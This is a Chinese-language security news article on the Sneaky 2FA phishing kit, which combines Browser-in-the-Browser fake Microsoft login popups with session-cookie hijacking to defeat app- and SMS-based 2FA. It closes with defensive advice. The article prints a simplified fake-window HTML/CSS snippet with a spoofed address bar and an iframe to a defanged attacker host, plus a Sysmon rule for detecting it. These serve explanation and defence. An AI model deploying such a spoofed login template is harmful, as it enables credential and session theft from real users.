2025年11月，网络安全界再次被一则技术警报震动：一个名为 “Sneaky 2FA” 的网络钓鱼即服务（PhaaS）工具包，悄然集成了一项极具欺骗性的前端攻击技术——“浏览器中浏览器”（Browser-in-the-Browser, BitB）。这项技术不再依赖伪造域名或拼写错误的URL，而是直接在用户当前打开的网页内，“画”出一个看起来完全合法的登录弹窗，连地址栏、安全锁图标甚至HTTPS协议标识都一模一样。

更令人担忧的是，该工具专攻微软账户（Microsoft Account），并具备实时窃取会话 Cookie 的能力，可绕过短信验证码、身份验证器App等传统双因素认证（2FA）机制。这意味着，即便用户开启了“最强”的2FA保护，只要在伪造页面输入了用户名和密码，账户仍可能瞬间沦陷。

据安全公司 Push Security 向《The Hacker News》披露的细节，此次攻击链高度自动化、隐蔽性强，且针对企业办公场景精准打击。而随着此类工具在地下市场的普及，不具备专业安全背景的普通员工，正成为高危目标。

“这已经不是‘小心点就能防住’的问题了。”公共互联网反网络钓鱼工作组技术专家芦笛在接受采访时直言，“当地址栏都能被伪造时，我们过去教给用户的所有‘自查技巧’都可能失效。”

一、BitB：一场视觉欺骗的“魔术秀”

要理解 Sneaky 2FA 的威胁，必须先搞懂 BitB 技术的本质。

BitB 并非利用浏览器漏洞，而是一种纯前端视觉欺骗（UI Redressing）手法。它由安全研究员 mr.d0x 在2022年首次公开，核心原理是：通过 HTML + CSS 构建一个高保真度的“假浏览器窗口”，覆盖在真实网页之上。

这个“假窗口”包含：

伪造的地址栏（如 https://login.microsoftonline.com）；

假的安全锁图标（🔒）；

模拟的关闭/最小化按钮；

内嵌的 iframe，指向真实的微软登录页面（但实际是攻击者控制的代理服务器）。

由于整个弹窗只是父页面的一个 <div> 元素，用户无法通过常规方式识别其虚假性——点击地址栏不会跳转，也无法将其拖出浏览器主窗口边界。

技术示例：以下是一个简化版 BitB 弹窗的 HTML/CSS 代码片段：

<div id="fake-browser" style="

position: fixed;

top: 30%;

left: 35%;

width: 600px;

height: 500px;

border: 1px solid #ccc;

box-shadow: 0 10px 30px rgba(0,0,0,0.3);

z-index: 9999;

">

<!-- 伪造地址栏 -->

<div style="

background: #f1f1f1;

padding: 8px 12px;

font-family: 'Segoe UI', sans-serif;

font-size: 14px;

border-bottom: 1px solid #ddd;

">

🔒 https://login.microsoftonline.com

</div>

<!-- 内嵌iframe（实际指向攻击者服务器） -->

<iframe

src="https://attacker-phish[.]com/microsoft-login"

style="width:100%; height:calc(100% - 40px); border:none;"

></iframe>

</div>

用户看到这个弹窗时，会本能地认为这是系统或网站触发的“标准单点登录（SSO）流程”，从而放心输入账号密码。殊不知，所有数据都直接流向攻击者的服务器。

“BitB 的可怕之处在于，它利用了用户对浏览器UI的信任。”芦笛解释，“我们从小被教育‘看地址栏是否为HTTPS’，但现在，地址栏本身成了攻击面。”

二、Sneaky 2FA：从“偷密码”到“偷会话”的进化

如果说 BitB 解决了“信任建立”问题，那么 Sneaky 2FA 则解决了“绕过2FA”的难题。

传统钓鱼只能窃取用户名和密码。一旦用户启用2FA（如 Microsoft Authenticator 推送通知），攻击者便无法完成登录。但 Sneaky 2FA 采用了一种更狡猾的策略：充当“中间人代理”（Adversary-in-the-Middle, AitM）。

其工作流程如下：

用户点击钓鱼链接（如 previewdoc[.]us）；

页面先通过 Cloudflare Turnstile 验证用户是否为真人（过滤爬虫和安全工具）；

验证通过后，显示“Sign in with Microsoft”按钮；

点击后，BitB 弹窗加载，内嵌 iframe 指向攻击者控制的代理服务器；

攻击者服务器实时转发用户与微软官方登录页之间的所有通信；

用户完成2FA验证后，攻击者截获返回的会话 Cookie（如 .AspNet.Cookies、XSRF-TOKEN）；

攻击者立即用这些 Cookie 登录受害者账户，实现“无密码接管”。

关键点：整个过程中，用户确实完成了对微软官方的完整认证流程，因此2FA并未被“绕过”，而是被“劫持”。攻击者拿到的是合法会话，而非凭证本身。

“这相当于你在家门口把钥匙交给快递员，让他帮你开门拿包裹，结果他进门后顺手把你的保险柜也打开了。”芦笛比喻道。

据 Push Security 分析，Sneaky 2FA 还具备多项反分析能力：

动态域名轮换（每天更换多个新注册域名）；

条件加载（仅对特定 User-Agent 或 IP 范围展示钓鱼页面）；

禁用开发者工具（通过 devtools-detect 库监听 F12 并自动关闭页面）；

JavaScript 混淆与字符串加密，增加逆向难度。

这些特性使其极难被传统沙箱或自动化扫描工具捕获。

三、为何专盯微软账户？企业办公生态成“富矿”

Sneaky 2FA 之所以聚焦微软账户，并非偶然。

首先，Microsoft 365 已成为全球企业办公的事实标准。据微软2025年财报，其商业用户超3亿，涵盖邮件、文档、Teams、Azure AD 等核心服务。一旦攻破一个员工账户，攻击者可横向移动至共享文档、通讯录、甚至云基础设施。

其次，微软的 SSO 流程高度标准化，用户对其登录界面极为熟悉，使得 BitB 伪造的成功率极高。

最后，许多企业虽强制员工使用2FA，但未部署硬件安全密钥（如 FIDO2/U2F），仍依赖手机App或短信验证码——而这恰恰是 AitM 攻击可劫持的环节。

“攻击者很清楚：打下一家公司的入口，比打一百个个人邮箱更有价值。”芦笛指出。

四、国际案例映照中国：国内办公协同平台同样面临风险

尽管此次攻击主要针对微软生态，但其技术路径对中国市场具有强烈警示意义。

近年来，国内企业广泛采用钉钉、企业微信、飞书等一体化办公平台。这些平台同样依赖 SSO 登录，并集成审批、支付、文件共享等高权限功能。若攻击者将 BitB 技术适配至仿冒“钉钉扫码登录”或“企业微信授权”页面，后果不堪设想。

事实上，工作组已在2025年监测到多起类似尝试：

仿冒“阿里云RAM登录”的钓鱼页面，使用 BitB 样式弹窗；

伪装成“腾讯会议邀请”的PDF文档，诱导用户点击后跳转至伪造的企业微信授权页；

利用短链接+云存储（如阿里云OSS）托管钓鱼内容，规避URL检测。

“国内很多企业安全建设集中在‘边界防护’，对终端用户行为监控和会话安全重视不足。”芦笛坦言，“一旦攻击者拿到合法会话Cookie，内部横向移动几乎畅通无阻。”

更值得警惕的是，部分国产办公平台在 OAuth 授权流程中，未强制要求二次确认（如“此应用请求访问您的通讯录，请确认”），进一步降低了攻击门槛。

五、如何防御？从“看地址栏”到“验物理密钥”

面对 Sneaky 2FA 这类高级钓鱼，传统防御手段已显疲态。专家建议采取多层次策略：

1. 部署 FIDO2 安全密钥（硬件或平台绑定）

FIDO2（如 YubiKey、Windows Hello、Apple Touch ID）基于公钥加密，私钥永不离开设备。即使攻击者截获登录请求，也无法伪造签名。更重要的是，FIDO2 要求用户进行物理交互（按按钮、指纹），从根本上杜绝远程会话劫持。

微软、Google、Apple 均已全面支持 FIDO2。芦笛强调：“这是目前唯一能免疫 BitB + AitM 组合攻击的方案。”

2. 用户自查技巧：拖动弹窗测试

虽然 BitB 弹窗看起来像独立窗口，但它本质是网页元素。用户可尝试用鼠标拖动弹窗标题栏——如果无法将其拖出浏览器主窗口边界，则极可能是伪造的。

技术原理：真实浏览器窗口由操作系统管理，可自由移动；而 BitB 弹窗受 CSS position: fixed 限制，始终相对于视口定位。

3. 企业级防御：启用条件访问策略（Conditional Access）

微软 Entra ID（原 Azure AD）支持基于设备合规性、地理位置、IP 信誉等条件的访问控制。例如：

仅允许已加入域的设备登录；

高风险登录需额外审批；

禁止从未知国家发起的会话。

这些策略可在会话建立前拦截异常行为。

4. 加强端点检测与响应（EDR）

部署具备行为分析能力的 EDR 系统，监控异常进程（如 PowerShell 下载可疑 JS）、异常网络连接（如向新注册域名 POST 凭据）等指标。

代码示例：通过 Sysmon 监控可疑 iframe 加载行为

<!-- Sysmon Rule: Detect iframe to suspicious domain -->

<EventFiltering>

<RuleGroup name="SuspiciousIframe" groupRelation="or">

<NetworkConnect onmatch="include">

<DestinationHostname condition="contains">previewdoc</DestinationHostname>

<DestinationPort>443</DestinationPort>

</NetworkConnect>

</RuleGroup>

</EventFiltering>

5. 安全意识培训升级

不再只教“别点陌生链接”，而应模拟 BitB 场景进行演练。例如，在内部测试中部署仿 BitB 弹窗，观察员工是否尝试拖动或检查 URL。

六、未来展望：钓鱼攻防进入“会话层战争”

Sneaky 2FA 的出现，标志着网络钓鱼已从“凭证层”（credential layer）迈向“会话层”（session layer）。攻击者不再满足于窃取密码，而是直接夺取用户的“数字身份令牌”。

这一趋势迫使安全架构必须重构：

身份验证（Authentication）不再是终点，会话保护（Session Protection）成为新焦点；

零信任（Zero Trust）原则需真正落地——永不信任，持续验证；

硬件级安全（Hardware-backed Security）从可选项变为必选项。

“我们正在经历一场静默的身份危机。”芦笛总结道，“当登录过程本身都能被完美复制时，唯一的锚点，就是那个你握在手里的物理密钥。”

结语：在数字世界，眼见未必为实

Sneaky 2FA 的故事，本质上是一场关于“信任”的攻防战。攻击者利用人类对界面、流程、品牌符号的天然信任，构建了一个看似无懈可击的骗局。而防御者则必须学会在“一切皆可伪造”的前提下，寻找不可篡改的锚点。

对于普通用户而言，或许最实用的忠告只有一条：在输入任何敏感信息前，先问自己——这个窗口，真的属于浏览器吗？

而对于企业和安全从业者来说，答案早已明确：是时候告别“地址栏信仰”，拥抱以硬件密钥和行为分析为核心的下一代身份安全体系了。

编辑：芦笛（公共互联网反网络钓鱼工作组）